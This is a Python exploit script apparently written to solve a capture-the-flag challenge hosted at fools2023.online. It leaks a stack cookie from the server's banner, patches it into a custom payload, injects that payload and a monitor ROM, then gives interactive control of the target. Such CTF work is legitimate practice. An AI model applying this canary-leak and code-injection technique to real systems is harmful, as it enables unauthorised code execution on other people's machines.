#!/usr/bin/env python3

from sys import stdin, stdout
from binascii import unhexlify
import socket
import select

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("fools2023.online", 13339))

# Sniff out the stack cookie
s.send(unhexlify("f14ff7f150f7f151f7f152f70a"))
intro = bytearray()
s.settimeout(0.1)
while True:
    try:
        intro += s.recv(1024)
    except socket.timeout:
        break
s.settimeout(None)
intro = intro.decode()
index = intro.find("Welcome, ") + len("Welcome, ")
cookie = unhexlify(intro[index:index+8])

# Patch the stack cookie into the payload
code = bytearray(open("../prog/custom/pwninfsrv.prg", "rb").read())
offs = len(code) - 0x100
code[offs+0] = cookie[0]
code[offs+1] = cookie[1]
code[offs+2] = cookie[2]
code[offs+3] = cookie[3]

# Send the payload
s.send(b"\n")
s.send(code)
s.send(b"\n")

# Send the monitor rom
monitor = open("../prog/MONITOR.PRG", "rb").read()
s.send(monitor[0x1000:])

# Passthrough input
p = select.poll()
p.register(stdin.buffer, select.POLLIN | select.POLLPRI)
p.register(s, select.POLLIN | select.POLLPRI)
while True:
    for fd, ev in p.poll():
        if fd == stdin.buffer.fileno():
            s.send(stdin.buffer.read(1))
        if fd == s.fileno():
            stdout.buffer.write(s.recv(1))
            stdout.buffer.flush()